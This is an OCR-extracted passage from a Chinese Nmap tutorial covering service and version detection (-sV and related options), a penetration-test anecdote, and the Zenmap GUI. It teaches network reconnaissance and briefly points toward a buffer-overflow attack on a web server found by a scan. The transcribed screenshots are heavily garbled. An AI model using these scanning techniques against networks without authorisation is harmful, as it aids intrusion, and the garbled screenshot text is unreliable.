以 使 用 Nmap 进行 扫描 ， 也 许 真正 的 使 用 率 可 能 连 一 半 都 不 到 。 

有 时 ， 单 位 为 了 确保 安全 会 及 时 地 更 新 操作 系统 ， 但 是 有 时 有 些 管理 人 员 为 了 图 方便 却 
还 在 使 用 老 旧 的 操作 系统 ， 例 如 Windows 2000。 通 过 Nmap 的 操作 系统 检测 功能 ， 就 可 以 轻 
而 易 举 地 发 现 这 些 系统 。 

如 果 将 新 的 操作 系统 指纹 信息 提交 到 http://iNSEcure.org/Nmap/submit/， 也 许 在 下 一 个 版 
本 的 相应 的 数据 库 中 就 会 出 现 你 这 次 提交 的 设备 信息 。 





44 为 什么 要 进行 服务 发 现 


在 对 一 个 企业 的 一 台 服 务 器 (例如 192.168.153.131) 进行 安全 审查 的 时 候 ， 发 现 一 个 
网 络 管理 人 员 仍 然 在 使 用 不 安全 的 telnet 服务 ， 对 此 建议 使 用 更 为 安全 的 SSH 服务 来 代替 
telnet， 扫 描 过 程 如 图 4-4 所 示 。 


Aa IAD KEO HMH) 

目标 [192168153131 -| em 

R$: [nmap 192.168.153.131 

Lomo omm] [nopasaran [Ee 


BERR EN | nmap 192.168.153.131 
E bogon (192 
























































Starting Nmap 7.30 ( https://nmap.org ) at 2016-11-14 12:43 ?D1iitéx?é 
EJ 


Nmap scan report for bogon (192.168.153.131) 
Host is up (0.0000060s latency). 
; osed po 
































图 4-4 在 目标 系统 上 发 现 了 不 安全 的 telnet 服务 
再 次 进行 检查 时 ， 得 到 如 图 4-5 所 示 的 结果 。 
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图 4-5 ”目标 系统 已 经 替换 为 安全 的 SSH 服务 
看 起 来 好 像 网 络 管理 人 员 听从 了 建议 ， 将 不 安全 的 应 用 telnet 替换 成 了 SSH. 
不 过 ， 端 口 检查 只 是 快速 检查 的 一 部 分 ， 在 进一步 检查 时 ， 发 现 该 网 络 管理 人 员 只 是 将 
telnet 服务 转移 到 21 端口 上 ， 使 它 看 起 来 就 如 同一 个 SSH 服务 一 样 ， 如 图 4-6 所 示 。 偷 懒 的 
网 络 管理 人 员 这 一 次 试图 利用 他 自己 的 经 验 蒙 混 过 关 。 
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Starting nmap 7.20 ( nitps!//nemo.org ) at 1619-11-14 12:52 ?Datvztz37 
3 





Service detection performed. Please report any incorrect results at nttpsi// 


masp.org/subeit] . 
Nas oone: L IP adiress (1 nost up) scanned in 75.33 seconds 























4-6 经 过 服务 识别 之 后 检测 到 的 目标 服务 
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当 再 一 次 给 出 渗透 测试 报告 的 时 候 ， 报 告 中 清楚 地 给 出 了 改进 意见 。 

可 是 为 什么 Nmap 前 后 会 给 出 两 种 完全 不 同 的 答案 呢 ? 

这 主要 是 因为 前 两 次 扫描 的 时 候 实际 上 并 没有 真 的 对 目标 的 服务 进行 扫描 ， 而 是 根据 一 
个 对 应 关系 直接 给 出 了 值 。 第 三 次 才 真 正 对 目标 服务 进行 了 扫描 。 

为 什么 Nmap 没有 进行 服务 识别 的 相关 操作 也 得 到 了 服务 类 型 呢 ? 一 般 情 况 下 ，FTP 服 
务 是 运行 在 21 端口 的 ，HTTP 服务 对 应 80 端口 ， 诸 如 这 些 端 口 都 是 公 知 端口 。 在 进行 Nmap 
端口 扫描 时 ，Nmap 并 没有 进行 服务 识别 ， 而 是 将 端口 号 在 自己 的 端口 服务 表 数 据 库 中 进行 
查找 ， 然 后 返回 告诉 你 。 一 般 情 况 下 ， 这 个 端口 开放 的 服务 是 这 个 ， 也 就 是 说 ， 这 种 返回 的 
服务 只 是 数据 库 中 的 ， 并 非 事实 上 端口 所 运行 的 服务 ， 只 是 一 般 情 况 下 大 家 都 会 使 用 固定 的 
端口 进行 固定 的 服务 。 把 Nmap 指向 一 个 远程 机 器 ， 它 可 能 告诉 您 端口 25/tcp、80/tcp 和 53/ 




















udp 是 开放 的 。 通 过 包含 大 约 2200 个 著名 服务 的 Nmap-services 数据 库 ，Nmap 可 以 报告 哪 
些 端口 可 能 对 应 于 邮件 服务 器 (SMTP), Web 服务 器 (HTTP) 和 域名 服务 器 (DNS)。 这 种 
查询 通常 是 正确 的 一 一 事实 上 ， 绝 大 多 数 在 TCP 端口 25 监听 的 守护 进程 是 邮件 服务 器 。 图 
4-7 中 给 出 了 Nmap-services 数据 库 中 的 详细 信息 。 
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ca-2 5065/tcp 0. 000000 * Channel Access 2 

ca-2 5065/udp 0. 000000 * Channel Access 2 | 
stanag-5066 5066/tcp 0. 000076 # STANAG-5066-SUBNET-INTF 
stanag-5066 5066/udp 0. 000000 * STANAG-5066-SUBNET-INTF 
authentx 5067/tcp 0. 000000 * Authentx Service 
authentx  5067/udp 0.000000  # àuthentx Service 

bitforestsrv5068/tcp 0. 000000 * Bitforest Data Service a 
unknown 5068/udp 0. 000330 

i-net-2000-npr 5069/tcp 0. 000000 * I/Net 2000-NPR I 
i-net-2000-npr 5069/udp 0. 000330 * I/Net 2000-NPR 

vtsas 50T0/tcp 0. 000076 * VersaTrans Server Agent Service 
vtsas 5070/udp 0. 000000 * VersaTrans Server Agent Service 
poverschool 5071/tcp 0. 000000 

poverschool 5071/udp ^ 0.000830  £ PowerSchool M 


MN aaa ik 
10% O 一 -0 一 由 | 
































图 4-7 Nmap-services 数据 库 中 的 详细 信息 
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然而 ， 决 不 能 百 分 之 一 百 地 相信 这 些 ! 一 个 网 络 使 用 人 员 完 全 可 以 在 一 些 不 相干 的 端口 
上 运行 服务 。 即 使 Nmap 是 对 的 ， 假 设 运行 服务 的 确实 是 SMTP、HTTP 和 DNS， 那 也 没有 
提供 特别 多 的 信息 。 为 公司 或 者 客户 做 安全 评估 (或 者 甚至 简单 的 网 络 明细 清单 ) 时 ， 你 确 
实 想 知道 正在 运行 什么 邮件 和 域名 服务 器 以 及 它们 的 版 本 。 一 个 精确 的 版 本 号 对 了 解 服务 器 
有 什么 漏洞 提供 了 巨大 帮助 ， 而 服务 发 现 可 以 帮 你 获得 该 信息 。 








45 如 何 使 用 Nmap 进行 服务 发 现 


如 何 进行 更 精确 的 服务 发 现 呢 ? Nmap 提供 了 更 精确 的 服务 及 版 本 检测 选项 ， 可 通过 添 
加 选项 -sV 进行 服务 和 版 本 检测 。 服 务 和 版 本 检测 还 有 更 多 的 选项 。 

首先 进行 端口 扫描 ， 默 认 情况 下 使 用 SYN 扫描 。 

其 次 进行 服务 识别 ， 发 送 探 针 报 文 ， 得 到 返回 确认 值 ， 确 认 服 务 。 

最 后 进行 版 本 识别 ， 发 送 探 针 报 文 ， 得 到 返回 的 报 文 信息 ， 分 析 得 出 服务 的 版 本 。 

在 发 现 开放 的 TCP 端口 或 者 UDP 端口 之 后 ， 服 务 发 现 程序 将 会 对 这 些 端口 进行 探测 ， 
以 此 确定 该 端口 运行 的 具体 服务 。 如 果 在 扫描 某 个 UDP 端口 后 仍然 无 法 确定 该 端口 是 open 
还 是 fltered， 那 么 该 端口 状态 就 被 标记 为 openlfiltered。 版 本 探测 将 试图 从 这 些 端 口 引 发 一 个 
响应 ( 就 像 它 对 开放 端口 做 的 一 样 )， 如 果 成 功 ， 就 把 状态 改 为 open。openlfiltered TCP 端口 
用 同样 的 方法 对 待 。Nmap-service-probes 数据 库 包含 查询 不 同 服务 的 探测 报 文 和 解析 识别 响 
应 的 匹配 表达 式 。 版 本 检测 程序 会 将 探测 结果 与 Nmap-service-probes 数据 库 中 的 内 容 进行 比 
较 ， 如 果 与 其 中 的 某 一 项 匹配 成 功 ， 就 可 以 确认 目标 端口 运行 的 具体 服务 。 当 Nmap 从 某 个 
服务 收 到 响应 ， 但 不 能 在 数据 库 中 找到 匹配 时 ， 它 就 打印 一 个 特殊 的 fingerprint 和 一 个 URL 
方便 给 你 提交 ， 如 果 确 实 知道 端口 运行 什么 服务 ， 可 以 花 两 分 钟 提交 自己 的 发 现 ， 让 每 个 人 
受益 。 

可 以 使 用 以 下 选项 打开 和 控制 版 本 检测 。 

-SV (版 本 探测 ) 

打开 版 本 探测 。 也 可 以 用 -A 同时 打开 操作 系统 探测 和 服务 发 现 。 

--allports (不 为 版 本 探测 排除 任何 端口 ) 

通常 ，Nmap 在 进行 版 本 探测 时 不 会 对 目标 的 全 部 端口 进行 扫描 ， 而 是 会 跳 过 一 些 端口 ， 
例如 端口 号 为 9100 的 TCP 端口 。 如 果 对 这 个 端口 进行 扫描 ， 而 目标 又 恰好 是 一 台 打印 机 
的 话 ， 这 人 台 打 印 机 就 有 可 能 会 将 所 有 的 数据 都 打印 出 来 。 如 果 确 实 有 必要 的 话 ， 也 可 以 使 
用 --allports 扫描 所 有 的 端口 。 

--version-intensity «intensity» (设置 版 本 扫描 强度 ) 

当 进 行 版 本 扫描 (-sV) 时 ，Nmap 发 送 一 系列 探测 报 文 ， 每 个 报 文 都 被 赋予 一 个 1 到 9 之 
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间 的 值 。 这 里 的 强度 水 平 说 明了 应 该 使 用 哪些 探测 报 文 。 数 值 越 高 ， 服 务 越 有 可 能 被 正确 识 
别 。 然 而 ， 高 强度 扫描 花 更 多 时 间 。 强 度 值 必须 在 0 和 9 之 间 。 上 默认 是 7。 

—version-light ( 打开 轻 量 级 模式 ) 

-version-light 其 实 就 相当 于 --version-intensity 2。 这 种 轻 量 级 模式 使 版 本 扫描 速度 快 了 
许多 ， 不 过 使 用 这 种 模式 对 服务 进行 扫描 成 功 的 几率 也 小 一 些 。 

--version-all ( 尝试 每 个 探测 ) 

--Version-all 其 实 就 相当 于 version-intensity 9， 保 证 对 每 个 端口 尝试 所 有 探测 报 文 。 

--version-trace (跟踪 版 本 扫描 活动 ) 

这 将 会 使 Nmap 打印 出 关于 正在 进行 的 扫描 的 详细 调试 信息 。 它 是 你 用 --packet-trace 所 
得 到 的 信息 的 子 集 。 

-SR (RPC 扫描 ) 

这 种 方法 和 许多 端口 扫描 方法 联合 使 用 。 它 对 所 有 被 发 现 开放 的 TCP/UDP 端口 执行 
SunRPC 程序 NULL 命令 ， 试 图 确定 它们 是 否 RPC 端口 ， 如 果 是 ， 可 以 确定 是 什么 程序 和 版 
本 号 。 

刘 开 该 如 何 使 用 本 章 中 学 到 的 知识 呢 ? 上 一 章 刘 开 已 经 找到 了 目标 的 卫 ， 下 一 步 是 找 出 
这 个 目标 的 服务 ， 要 知道 很 多 软件 上 运行 的 服务 都 是 存在 漏洞 的 。 

扫描 的 结果 如 下 。 


Starting Nmap 7.30 ( https://nmap.org 

Nmap scan report for bogon (192.168.153.131) 
Host is up (0.00018s latency). 

Not shown: 998 closed ports 





PORT STATE SERVICE VERSION 
21/tcp open ftp Microsoft ftpd 5.0 
80/tcp open http PMSoftware Simple WebServer 2.2 


MAC Address: 00:0C:29:90:DF:C3 (VMware)Device type: general purposeRunning: 
Microsoft Windows 7 
Nmap done: 1 IP address (1 host up) scanned in 54.10 seconds 


刘 开 经 过 扫描 发 现 了 目标 主机 上 居然 安装 着 PMSoftware Simple WebServer 2.2, "E 
AÉ Windows 7 并 不 像 Windows XP 和 Windows 2003 那样 存在 大 量 的 漏洞 ， 但 是 这 一 款 
PMSoftware Simple WebServer 软件 上 存在 着 简单 Web 服务 器 连接 缓冲 区 溢出 漏洞 。 

现在 刘 开 只 需要 向 目标 发 送 一 个 恶意 的 HTTP 请 求 ， 从 而 引起 目标 应 用 程序 的 缓冲 区 溢 
出 ， 就 可 以 最 终 控制 目标 计算 机 。 但 是 这 一 切 又 如 何 实现 呢 ? 

对 版 本 扫描 检测 的 讲解 到 此 为 止 ， 更 加 深入 的 部 分 会 在 第 12 章 进行 介绍 。 
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小 结 





本 章 讲述 了 两 个 故事 ， 一 个 和 操作 系统 扫描 有 关 ， 另 一 个 和 服务 发 现 有 关 。 实 际 工 作 
中 ， 这 两 个 扫描 都 是 非常 有 用 的 。 要 注意 的 是 ， 这 两 个 扫描 都 并 不 是 100% 精确 的 。 尤 其 是 
不 使 用 -sV 扫描 时 ， 得 到 的 关于 目标 服务 的 信息 很 多 时 候 是 十 分 奇怪 的 。 因 此 一 定 要 研究 
Nmap 的 工作 原理 ， 和 否则 Nmap 这 款 强 大 的 工具 就 沦落 成 “ 耕 田 的 千里 马 ”。 





Nmap 的 图 形 化 操作 工具 一 一 


Zenmap 


相 比 起 命令 行 式 的 操作 ， 绝 大 多 数 人 可 能 已 经 习惯 了 图 形 化 的 操作 。 当 然 这 两 种 方式 各 
自 拥有 自己 的 优势 ， 命 令 行 的 Nmap 稳定 性 更 高 ， 速 度 更 快 。 而 图 形 化 的 Zenmap 执行 起 来 
更 容易 上 手 ， 结 果 也 更 为 直观 。 本 章 给 出 了 Zenmap 的 相关 操作 方式 ， 如 下 所 示 。 

口 启动 Zenmap 的 方式 。 

口 Zenmap 扫描 的 管理 。 

口 在 Zenmap 中 执行 扫描 命令 的 方式 。 

口 如 何 管 理 Zenmap 的 配置 。 

口 如 何 管理 Zenmap 的 结果 。 








5.1 Zenmap 简介 


Nmap 本 身 只 提供 了 命令 行 式 的 操作 ， 这 一 点 让 很 多 习惯 于 图 形 化 操作 的 用 户 感到 十 分 
不 习惯 。Zenmap 的 出 现 极 大 地 扩充 了 Nmap 的 使 用 群体 。Zenmap 是 一 个 可 以 应 用 在 多 种 平 
台 上 ， 而 且 用 户 操作 人 性 极为 友好 的 Nmap 图 形 化 界面 。 与 Nmap 相同 ，Zenmap 本 身 也 是 开 
放 源 码 的 ， 所 有 在 Nmap 命令 行 中 可 以 实现 的 操作 ， 都 可 以 在 Zenmap 中 实现 。 首 先 看 一 下 
Zenmap 提供 的 特殊 功能 。 
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Q Zenmap 提供 了 一 个 向 导 式 的 命令 创建 方式 。 利 用 Zenmap， 可 以 互动 式 地 创建 Nmap 
命令 。 

口 创建 配置 文件 。Zenmap 中 包含 了 一 些 常见 的 默认 扫描 配置 文件 。 另 外 也 可 以 保存 自 
己 的 扫描 文件 ， 以 后 再 遇 上 相同 的 情况 ， 可 以 无 须 配置 直接 调用 这 些 文件 。 

口 扫描 tabs 项 。 利 用 Zenmap 的 选项 卡 (tabs) 项 可 以 在 同一 时 间 运 行 和 显示 多 个 扫描 。 

口 保存 扫描 结果 。 使 用 Zenmap 可 以 将 扫描 的 结果 保存 到 一 个 文件 中 ， 以 便 以 后 调用 。 

口 比较 扫描 结果 。 可 以 对 多 次 扫描 的 结果 进行 比较 ， 以 便 找 出 其 中 的 差异 。 

口 检索 数据 库 。 扫 描 的 结果 可 以 保存 到 一 个 可 以 检索 的 数据 库 中 。 

本 章 中 将 学 习 如 何 使 用 Zenmap 以 及 如 何 进 行 扫描 的 各 种 操作 。 











5.2 ”启动 Zenmap 
如 图 5-1 所 示 ， 可 以 在 命令 行 中 输入 Zenmap 来 启动 Zenmap。 





国 SA CMWindows\system32\cmd.exe erem] 











图 5-1 通过 命令 行 方式 启动 Zenmap 
或 者 直接 双击 如 图 5-2 所 示 的 Zenmap 的 桌面 图 标 来 启动 。 




















5-2 Zenmap 的 桌面 快捷 方式 

打开 Zenmap 窗口 之 后 ， 可 以 看 到 如 图 5-3 所 示 的 Zenmap 界面 。 
如 果 想 使 用 Zenmap 的 话 ， 只 需要 在 目标 后 面 的 地 址 栏 中 输入 目标 的 IP 地 址 或 者 域名 。 
然后 单 击 后 面 的 扫描 按钮 即 可 开始 扫描 。 这 个 时 候 Zenmap 会 采用 默认 的 Intense scan 配置 进 
行 扫描 。Zenmap 中 对 地 址 格式 的 要 求 与 Nmap 完全 一 样 ， 另 外 ，Zenmap 的 地 址 栏 还 是 一 个 
下 拉 列 表 框 ， 这 个 列表 框 中 保存 了 之 前 的 所 有 扫描 目标 。 如 果 想 要 重复 扫描 之 前 检测 过 的 目 
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标 ， 就 可 以 从 下 拉 列 表 框 中 选择 。Zenmap 中 按照 扫描 选项 的 不 同 ， 也 提供 了 多 种 不 同 的 扫 
措 配置 。 我 们 可 以 在 如 图 5-4 所 示 的 下 拉 列 表 框 中 选择 这 些 配置 。 





扫描 (a) IRAD KESO PPH) | 





»- | [mee [rmm en 


$e [nmap T4 Av 0 





















































图 5-3  Zenmap 的 操作 界面 





[v] mg. intense scan 
Intense scan. 
Intense scan plus UDP 


Napsi: [aun EA tense scan, al TCP ports 
































Intense scan, no ping 
Ping scan 

Quick scan 

Quick scan plus 

Quick traceroute 

Regular scan 

Slow comprehensive scan 
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和 Nmap 的 互动 模式 相同 ，Zenmap 也 可 以 在 扫描 的 同时 进行 输出 操作 。 这 样 就 可 以 看 
到 当前 的 扫描 进行 到 什么 步骤 了 。Zenmap 的 左 侧 窗 格 中 显示 扫描 的 状态 ， 当 选择 “Nmap 输 
出 ”选项 卡 时 ， 右 侧 窗 格 显示 的 是 具体 的 扫描 信息 。 当 扫描 结束 时 ， 左 侧 窗 格 将 显示 出 所 有 
扫描 过 的 目标 主机 。Zenmap 显示 的 输出 和 Nmap 是 一 样 的 ， 这 种 格式 十 分 容易 阅读 。 另 外 
需要 注意 的 是 Zenmap 右 侧 的 5 个 选项 卡 中 ,“Nmap 输出 " "S H1 /主机 "拓扑" “主机 明细 扫 
描 ” 都 包含 扫描 的 结果 。 

单 击 “端口 /主机 ”选项 卡 ，Zenmap 右 侧 窗 格 将 显示 扫描 过 的 主机 上 的 端口 状态 。 你 也 
可 以 通过 单 击 这 些 信 息 上 面 的 列 标题 对 下 面 的 内 容 进行 排序 。 

单 击 左 侧 窗 格 中 的 “主机 ”按钮 ， 然 后 选中 下 面 列表 中 的 一 台 主 机 ， 右 侧 窗 格 就 会 如 图 
5-5 所 示 显 示 出 该 主机 上 开放 的 端口 和 服务 信息 。 

















© Zenmap 
扫描 (a) IAD EEC) PMU) 
目标 | 10.16.39.0/24 -| EB Quickscan e [as] 取消 


























命令 nmap -T4 -F 10.16.39.0/24 


[messo me O) [apti mcn ren | enun | o 











Séeké 主机 aa [ *mi*9ücRsi e 84 | 
WM  bogon (10.16.39.3) € 135 tp open msrpc 
bogon (10.16.39.6) @ 139 tp open netbios-ssn 
W/ bogon (10.16.39.8) € 445 tp open microsoft-ds 


" bogon (10.16.39.15) E 


bogon (10.16.39.23) 
bogon (10.16.39.31) 
bogon (10.16.39.39) 3 

bogon (10.16.39.44) 

bogon (10.16.39.139) 

bogon (10.16.39.144) 
























































图 5-5 主机 上 开放 的 端口 和 服务 信息 
当 你 在 左 侧 窗 格 单 击 “ 服 务 ”按钮 时 ， 下 面 列表 中 将 显示 出 各 种 服务 ， 单 击 其 中 一 项 ， 
右 侧 窗 格 就 会 如 图 5-6 所 示 提 供 该 服务 的 主机 信息 。 
Nmap 的 输出 方式 与 Zenmap 相同 。 通 常 启动 Nmap 后,“ Nmap 输出 ”选项 卡 默认 在 最 
前 面 。 图 5-7 中 给 出 了 Nmap 中 的 输出 。 
当 在 左 侧 主机 列表 中 选中 一 个 目标 主机 之 后 ， 单 击 “主机 明细 ”选项 卡 将 会 显示 出 具体 
的 主机 状态 和 地 址 列表 等 信息 ， 如 图 5-8 所 示 。 
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LSA-or-nterm 
microsoft-ds 
ms-sql-s 


ms-wbt-server 


























1 3 名 EE CEE EE 状态 4 版 本 
€ bogon (10.16.39.85) 80 tcp open 
€ bogon(10169.205) 80 — tcp open 
€ bogon(10.16.39.218) 80 — tcp open 




















10.16.39.0/24 


























nmap -T4 -F 10.16.39.0/24 








Nmap 编 出 














nmap -T4 -F 10.16.39.0/24 











Nmap scan report for bogon (10.16.39.239) 

Host is up (6.6010s latency). 

All 160 scanned ports on bogon (10.16.39.239) are filtered 
MAC Address: D8:15:0D:D8:4F:E3 (Tp-link Technologies) 


Nmap scan report for bogon (10.16.39.44) 
Host is up (0.00032s latency). 
Not shown: 90 closed ports 
PORT STATE SERVICE 
135/tcp open 

139/tcp open 

443/tcp open 

445/tcp open 

1025/tcp open 

1026/tcp open 

1027/tcp open 

1028/tcp open 

3389/tcp open 

8888/tcp open 


Nmap done: 256 IP addresses (13 hosts up) scanned in 14.48 seconds 








图 5-7 Nmap 输出 的 内 容 
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Hia IAD REC) AMH 
Bis (101639024 
































$9: [nmap -T4 -F 10.16.39.0124 




















日 地 址 列表 
1pv4 1016393 


















图 5-8 具体 的 主机 状态 和 地 址 列表 等 信息 


5.3 Zenmap 扫描 操作 


本 节 介 绍 Zenmap 在 扫描 时 的 基本 操作 。 


1. 创建 一 个 新 的 扫描 窗口 
如 果 希 望 创建 一 个 新 的 扫描 窗口 ， 可 以 在 菜单 栏 的 “扫描 ”菜单 中 单 击 “ 新 建 窗 口 ”命令 ， 
如 图 5-9 所 示 。 








O meS 
B 打开 扫描 (0) 
十 在 当前 窗口 打开 扫描 (9) 


E) RTD 
回 RISHUSETHSIER D) 












































nse: supported 
disabled (dangerous, but default) 
fled: Server supports SHBv2 protocol 


HOP RIT — ADORESS 
1 0.27 ms bogor (10.16.39.8) 


NSE: Script Post-scanning. 
Initiating NSE at 1: 

Completed NSE at 12:00, 0.065 elapsed 

Initiating NSE at 1: 

Completed NSE at 12:00, 0.00c elapsed 

Post-scan script results: 

| clock-sken: 

|. -z1s: Majority of systess scannes 

ed cata files fron: C:\Program Files (x6) map 

OS anc Service detection performed. Please report any incorrect results at 


sent: 2632 (91.24648) | Rcvd: 18 (1.114KB) d | 


图 5-9 ”在 Zenmap 中 创建 一 个 新 的 扫描 窗口 
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2. 退出 一 个 扫描 
如 果 希 望 关 闭 一 个 正在 进行 扫描 的 窗口 ， 可 以 在 菜单 栏 的 “扫描 ”菜单 中 单 击 “ 退 出 ” 
命令 ,或 者 单 击 窗口 右上 方 的 关闭 按钮 。 


3. 保存 一 个 扫描 
如 果 希 望 保存 一 个 扫描 ， 可 以 在 菜单 栏 的 “扫描 ”菜单 中 单 击 “ 保 存 扫描 ”命令 ， 默 认 


5.4 使 用 Zenmap 的 命令 向 导 来 创建 命令 


当 使 用 Zenmap 对 网 络 进 行 扫描 的 时 候 ， 无 须 记忆 那些 数量 众多 的 命令 。Zenmap 中 包 
含 了 一 个 内 置 的 命令 向 导 ， 当 想 要 构建 一 个 Nmap 命令 的 时 候 ， 可 以 通过 如 下 方式 来 完成 。 

首先 单 击 菜单 栏 上 的 “配置 ”菜单 ， 单 击 其 中 的 “新 的 配置 或 命令 ”命令 ， 如 图 5-10 
所 示 。 





x. Zenmap 
Aiia 工具 中 REC) 帮助 (H) 


== i | © WiNOER D) CP D) pem [intense sean z) (m) [ms 
| 局 AWHAPERE) Cre 
186: [nmap -T4-A -v 


"E NEL 


损 作 系统 € 主机 s 



























































图 5-10 在 Zenmap 中 启动 命令 向 导 
此 时 弹出 一 个 配置 编辑 器 ， 其 中 包含 8 个 选项 卡 。 第 一 个 选项 卡 是 “配置 ” 。 如 果 选 择 创 建 
一 个 配置 文件 ， 在 这 里 可 以 输入 一 个 配置 文件 名 ， 也 可 以 选择 输入 描述 信息 ， 如 图 5-11 所 示 。 
然后 单 击 “ 扫 描 ” 选 项 卡 ， 在 这 个 选项 卡 中 ， 扫 描 选项 包含 三 个 下 拉 式 菜单 ， 如 图 5-12 
所 示 。 
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nmap -T4 -A -v 10.16.39.8 

















5| Ping | ee | B5 | in| | es 








配置 文件 名 211.81.200.8 


d 。 ”2016 年 11 月 7 日 对 内 部 网 络 的 一 台 主 机 渤 行 兆 适 得 到 








Profile name 


This is how the profile will be 
identified in the drop-down 
combo box in the scan tab. 























图 5-11 配置 编辑 器 中 的 配置 选项 卡 


nmap -T4 -A -v 10.16.39.8 

















Ping | | 目标 | 9| e| em 











版 本 检测 (-sV) 
Idlef3f&Zombie) (-sI) 























This is how the profile will be 
identified in the drop-down 
combo box in the scan tab. 














图 5-12 配置 编辑 器 中 的 扫描 选项 卡 


接 下 来 单 击 “TCP 扫描 ”下 拉 列 表 ， 选 择 TCP 扫描 的 模式 ， 如 图 5-13 所 示 。 
"Non-TCP 扫描 ”下 拉 列 表 一 共 包括 6 个 选项 ， 如 图 5-14 所 示 。 
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nmap -T4 -A -v 10.16.39.8 

















Ping | us| ens i | xe] ens] 





E tdlefaf&Zombie) (-sD) TCP SYN (-5S) 

[7] FTP bounceXi& (-b) TCP connecti3fi (-sT) 

禁用 反 向 DNS 解析 (-n) ARDENA (sW) 
Xmas Treetaf (-sX) 

















nmap -T4 -A -v 10.16.39.8 





























Ping | ie | ers | m| m | em 





TCp 扫 并: 

Non-TCPi3f 

EUR: 

[V] 启用 所 有 高 级 / 攻 主 性 选项 (-A UDPESIR (-sU) 

E 损 作 系统 检测 (-O) Jp 协议 扫 注 (-sO) 

版 本 检测 (-sV) BORSE Cs) 

E 1dle 扫 次 Combie) CD — xxr Cen) 

E FTP bounceX& (-b) SCTP INITRSCIIE (-sV) 
禁用 反 向 DNS 解析 (-n) SCTP coolde-echoi& DEE (-sZ) 
E Pv (-6) 



































图 5-14 选择 Non-TCP 扫描 模式 
时 间 模 板 一 共 包 括 6 个 选项 ， 如 图 5-15 所 示 。 
"FW" 选项 卡 中 还 包括 7 个 可 选 的 复 选 框 ， 其 中 每 一 个 复 选 框 都 会 更 新 Nmap 中 的 命令 。 
“Ping” 选 项 卡 中 包含 了 大 量 与 Ping 有 关 的 操作 ， 可 以 选择 “扫描 之 前 不 ping 远程 主机 ” 
或 者 其 他 的 选项 ， 如 图 5-16 所 示 。 
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nmap -T4 -A -v 10.16.39.8 




















ES £8 | ping| ies | Bis [i8 | e| ns 





BREID: 10.16.39.8 

TCP: 

Non-TCPE 无 图 
[V] 启用 所 有 高 级 / 攻 二 性 运 项 (CA 无 

E 扣 作 系统 检测 -O) A CTO) 

E 版 本 检测 s) AX CT) 

F]ideis&Qombie (sD — aug (TD) 

E) FTP bounce 攻 击 (-b) 正 党 CT3) 

E 禁用 反 向 DNS 解 怕 (my | ane T4) 

E 1pv6 支 持 (-6) RECS 

















nmap -T4 -A -v 10.16.39.8 


























REZA pingi TEEN (pnj 
El ICMP ping (-PE) 
E ICMPRTISRERER (-PP) 
E ICMPPIRERERSTRER. (-PM) 
E] ACK ping (-PA) 
E] SYN ping CPS) 
E UDPÉERI (-PU) 
E) IPProtofER (-PO) 
[7] SCTP INIT ping 探 测 (-PY) 



































图 5-16 


“脚本 ”选项 卡 中 列 出 了 Nmap 中 所 有 支持 的 脚本 ， 如 果 和 希望 在 这 个 过 程 中 使 用 某 个 脚 
本 时 可 以 在 左 侧 列表 中 选择 ， 如 图 5-17 所 示 。 

在 “目标 ”选项 卡 中 ， 可 以 对 扫描 的 目标 进行 选择 。 在 这 里 可 以 添加 例外 的 主机 /网络 
以 及 其 他 的 各 个 选项 ， 如 图 5-18 所 示 。 
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nmap -T4 -A -v 10.16.39.8 




















msm|zs|»no| #5 Bu [| e| eni 


CEE en 


E| address-info. 








在 扫 冶 主机 之 前 不 愉 查 目标 是 否 在 
线 , 扫 毛 列 出 的 所 有 目标 . 


| 
Retrieves information from a listening 
E) afp-brute acarsd daemon. Acarsd decodes ACARS 
B fps (Aircraft Communication Addressing and 
E] afp-path-vuln 
F) afp-serverinfo 
E| afp-showmount r 

: Arguments 

uth 

Wes | acarsd-info timeout 
| acarsd-info bytes 
| 


E] ajp-brute 
© ajp-headers a 








Remove 

















| ms 
| nmap -T4 -A -v --script acarsd-info,afp-path-vuln 10.16.39. 
































The password to use for 
—— ication. 
E 例外 文件 (--excludefile) 





E 目标 列表 文件 i) 
E SENEN CR) 
E SARWAN (-p) 
E] ists (A 
































图 5-18 “目标 ”选项 卡 


“ 源 ” 选 项 卡 中 包含 一 些 特殊 的 技术 ,例如 设置 虚假 的 源 地 址 、 指 定 发 送 的 端口 等 ， 如 
图 5-19 所 示 。 


“其 它 ” 选 项 卡 中 提供 的 功能 很 多 ， 包括 TTL 值 的 设置 、 数 据 包 的 分 片 、 数 据 包 跟踪 等 
功能 ， 如 图 5-20 所 示 。 
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nmap -T4 -A -v --script acarsd-info,afp-path-vuln 10.16.39.8 




















xm | sus poo [ies | 有 5 [ne | em 
GESRERES H CD) 
设置 源 IP 地 址 (-5) 

RERAN (--source-port) 
设置 网 卡 Ce) 






































图 5-19 “ 源 ” 选 项 卡 





nmap -T4 -A -v --script acarsd-info,afp-path-vuln 10.16.39.8 

















majas] Ping | ie | eis [i9 e | 定时 








Eier (--packet-trace) 
SEFHRBULETELESSRSSRDO (or) 


追踪 到 目标 的 路 径 (—traceroute) 


最 大 重 试 次 数 (--max-retries) 






































图 5-20 “其 他 ”选项 卡 


最 后 的 “定时 ”选项 卡 中 给 出 了 大 量 的 并 发 性 的 选项 ， 如 图 5-21 所 示 。 
当 这 些 设置 都 完成 后 单 击 “ 保 存 修改 ”按钮 ， 就 可 以 产生 一 个 新 的 Nmap 扫描 命令 。 
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[nmap -T4 -A -v --script acarsd-info,afp-path-vuln 10.16.39.8 




















PES 











E 景 小 探 型 超时 (--min-rtttimeout 

[7] 初始 化 探测 超时 (--initial-rtt-timeout) 

E 最 大 并 行 探 型 主机 数量 (--max-hostgroup) 
最 小 并 行 探 型 主 机 数量 (--min-hostgroup) 
E 最 大 未 解决 扫 握 数 (--max-parallelism) 

E 最 小 未 解决 扫 握 数 (--min-parallelism) 

E SEXTSIBRESR. (--max-scan-delay) 

E BCMRRUSESEER (--scan-delay) 
































图 5-21 “定时 ”选项 卡 


5.5 对 Zenmap 的 配置 进行 管理 


Zenmap 中 包含 了 一 些 常 用 的 默认 配置 文件 。 当 选择 了 一 个 配置 文件 之 后 ， 对 应 的 Nmap 
命令 就 会 显示 在 Zenmap 的 命令 行 中 。 如 果 希 望 修改 某 一 个 配置 文件 ， 可 以 先 在 “配置 ”下 
拉 列 表 框 中 选中 要 修改 的 配置 ， 如 图 5-22 所 示 。 


fig) IAD EEO fep 


Ht 1016398 





[v] EE intense scan pusupp 








R$: |nmap -sS -sU -T4 -A -v 101639. Intense scan 




















Intense scan plus UDP 


[meus [sn sn... scan, ali rco ports 


~v 10.1639. 

















Intense scan, no ping 





TRACEROUTE Quick scan plus 
HOP RIT — ADDRESS i 
